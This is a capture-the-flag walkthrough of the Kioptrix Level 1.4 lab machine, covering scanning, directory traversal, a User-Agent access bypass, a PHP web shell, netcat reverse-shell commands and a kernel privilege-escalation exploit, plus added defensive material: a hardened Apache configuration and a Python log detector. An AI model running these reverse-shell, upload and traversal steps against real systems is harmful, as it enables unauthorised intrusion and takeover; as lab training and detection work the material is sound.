
Kioptrix Level 1.4 (#5) Walkthrough

Enumeration

nmap

nmap -sC -sV -oA nmap/Level5 192.168.43.212
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-12 09:06 EDT
Nmap scan report for kioptrix2014 (192.168.43.212)
Host is up (0.00038s latency).
Not shown: 997 filtered ports
PORT     STATE  SERVICE VERSION
22/tcp   closed ssh
80/tcp   open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
|_http-server-header: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8
8080/tcp open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
|_http-title: 403 Forbidden
MAC Address: 00:0C:29:D4:CB:84 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.54 seconds

Great! Only 2 open ports! Let's check port 80 first.

Exploit

The page just shows the words "It works!", so I opened Inspect Element to see whether there is any interesting info.

I saw this, and at the end of it a URL is provided.

After playing around in here, I found nothing interesting. Then a friend pointed me to something he called a Directory Traversal exploit, which is available on the exploit-db website.

Copy the provided query into our URL.

Then I searched Google for the location of the FreeBSD Apache config file.

By replacing the Apache version in that path, we can read the config file.

Then, scroll to the bottom

We can see that port 8080 actually lets us through if we use a Mozilla4.0 user-agent: Allow from env=Mozilla4_browser

Well, there is nothing more we can do here. Let's check port 8080.

We can't access it, but as we know, using the Mozilla4.0 user-agent should get us through. We can use Burp Suite to help us with this.

Intercept the traffic, go to Proxy -> Options -> Match and Replace, and tick the Mozilla4.0 user-agent rule.

We can access after this.
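The rule that let us in keys access to the port 8080 virtual host on the User-Agent request header, which every client sets freely, so it is not an access control at all. As an added example (this is not the Kioptrix box's actual httpd.conf; the directory paths, the management network and the htpasswd file are assumed placeholders), here is the shape of such a rule next to an Apache 2.2 replacement that restricts by source network and requires credentials:

```apache
# Weak: a header the client controls is the only gate.
SetEnvIf User-Agent "^Mozilla/4\.0" Mozilla4_browser
# Assumed directory path.
<Directory "/usr/local/www/apache22/protected">
    Order deny,allow
    Deny from all
    Allow from env=Mozilla4_browser
</Directory>

# Corrected (Apache 2.2 syntax, as on this box): source network AND credentials,
# neither of which a request header can forge.
<Directory "/usr/local/www/apache22/protected">
    Order deny,allow
    Deny from all
    # Assumed management network.
    Allow from 192.168.43.0/24
    AuthType Basic
    AuthName "Restricted"
    # Assumed htpasswd path.
    AuthUserFile "/usr/local/etc/apache22/htpasswd"
    Require valid-user
    # Both the network rule and the login must be satisfied.
    Satisfy All
</Directory>
```

Since Basic authentication sends credentials with every request, the corrected block only makes sense behind the mod_ssl the nmap scan already shows this server has loaded; serve the protected virtual host over HTTPS only.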

This took me a lot of time to figure out how to exploit and get a reverse shell from it.

We can get the exploit from exploit-db.

As one of the lines of the exploit shows, we can upload a PHP file to the website by replacing the field section.

Then, looking at the exploit, we can see this

If the exploit works successfully, we can navigate to /data.

I clicked one of the shells I had uploaded and appended ?cmd=id to the end of the URL.

Let's get a reverse shell from it.

Tried using

nc -nv <IP> <Port>

nc -e /bin/bash <IP> <port>

Both failed.

So, I went to pentestmonkey and got this php-reverse-shell file.

Then open the extracted file in nano and change the IP and port.

Then, on our machine, we can type

nc -nlvp 4444 < php-reverse-shell.php

In the URL's cmd parameter, we can type nc -nv 192.168.43.182 4444 > php-reverse-shell.php

Navigate back to /data and we will see that one folder has been uploaded.

On our machine, type again nc -nlvp 4444

and click on the file we just uploaded; then we will get the shell from it.
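Everything in this section leaves a trace in the Apache access log: the traversal request against port 80, the 403 on port 8080 that becomes a 200 once the User-Agent changes, and the PHP file called under /data with a cmd parameter. As an added example that is not part of the original walkthrough, the detector below parses combined-format log lines and flags all three patterns; the sample lines are constructed (they are not the Kioptrix box's log), and the parameter list and the /data directory are assumptions to adjust for your own environment.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Apache "combined" log format, one request per line.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Directory the walkthrough's uploaded shells were served from (assumed for other sites).
UPLOAD_DIR = "/data"
# Query parameter names that commonly carry a command for a web shell (assumed list).
CMD_PARAMS = ("cmd", "command", "exec")
# ".." as a whole path segment after decoding: "/../", "=../", or a leading "../".
TRAVERSAL_RE = re.compile(r"(?:^|[^\w.])\.\.(?:/|$)")

# Constructed sample log: a normal request, a traversal attempt, a 403 that turns into
# a 200 once the User-Agent changes, a web shell call under /data, and another normal request.
SAMPLE_LOG = """\
192.168.43.182 - - [12/May/2020:09:10:01 -0400] "GET / HTTP/1.1" 200 44 "-" "Mozilla/5.0"
192.168.43.182 - - [12/May/2020:09:11:07 -0400] "GET /viewer.php?file=%2f..%2f..%2f..%2fetc/passwd HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
192.168.43.182 - - [12/May/2020:09:12:30 -0400] "GET /admin/ HTTP/1.1" 403 202 "-" "Mozilla/5.0"
192.168.43.182 - - [12/May/2020:09:12:58 -0400] "GET /admin/ HTTP/1.1" 200 812 "-" "Mozilla/4.0 (compatible)"
192.168.43.182 - - [12/May/2020:09:14:02 -0400] "GET /data/shell.php?cmd=id HTTP/1.1" 200 61 "-" "Mozilla/4.0 (compatible)"
10.0.0.5 - - [12/May/2020:09:15:00 -0400] "GET /index.php?page=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def decode_path(path):
    """Percent-decode twice (catches %252e double encoding) and normalise backslashes."""
    return unquote(unquote(path)).replace("\\", "/")


def has_traversal(path):
    return bool(TRAVERSAL_RE.search(decode_path(path)))


def is_webshell_call(path):
    """A PHP script executed from the upload directory is suspicious by itself."""
    p = urlsplit(path).path
    return p.startswith(UPLOAD_DIR + "/") and p.lower().endswith(".php")


def command_of(path):
    """The command value carried by a known web-shell parameter, if any."""
    params = parse_qs(urlsplit(path).query, keep_blank_values=True)
    for name in CMD_PARAMS:
        if name in params:
            return params[name][0]
    return None


def find_ua_bypass(records):
    """Same client and path: a 403 followed by a 200 with a different User-Agent."""
    findings, last_denied = [], {}
    for rec in records:
        key = (rec["ip"], urlsplit(rec["path"]).path)
        if rec["status"] == 403:
            last_denied[key] = rec
        elif rec["status"] == 200 and key in last_denied:
            denied = last_denied.pop(key)
            if denied["ua"] != rec["ua"]:
                findings.append({"kind": "ua_bypass", "ip": rec["ip"], "path": key[1],
                                 "denied_ua": denied["ua"], "allowed_ua": rec["ua"]})
    return findings


def analyze(log_text):
    """Return one finding dict per suspicious pattern seen in the log text."""
    records = [r for r in (parse_line(l) for l in log_text.splitlines()) if r]
    findings = []
    for rec in records:
        if has_traversal(rec["path"]):
            findings.append({"kind": "traversal", "ip": rec["ip"], "path": rec["path"]})
        if is_webshell_call(rec["path"]):
            findings.append({"kind": "webshell", "ip": rec["ip"], "path": rec["path"],
                             "command": command_of(rec["path"])})
    findings.extend(find_ua_bypass(records))
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f)
```

The User-Agent check is the one most worth keeping: a 403-then-200 pair on the same path from the same client, with only the User-Agent changing between them, is exactly the footprint left by the Burp Match and Replace step above, and no amount of traversal signature matching would show it.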

Privilege Escalation

Type uname -a and we can see which kernel version this machine is using.

Then, go to searchsploit and find the exploit.

After trying, we find that this machine doesn't have wget, so we can use nc to transfer the file.

Navigate to /tmp

On our machine, type

nc -nlvp 4444 < 26368.c

On victim machine, type

nc -nv 192.168.43.182 4444 > 26368.c

Then we can compile the file by typing

gcc 26368.c -o exploit

chmod +x exploit

Run the exploit: ./exploit

Then, type /bin/csh -i

You got root!

Congratulations!
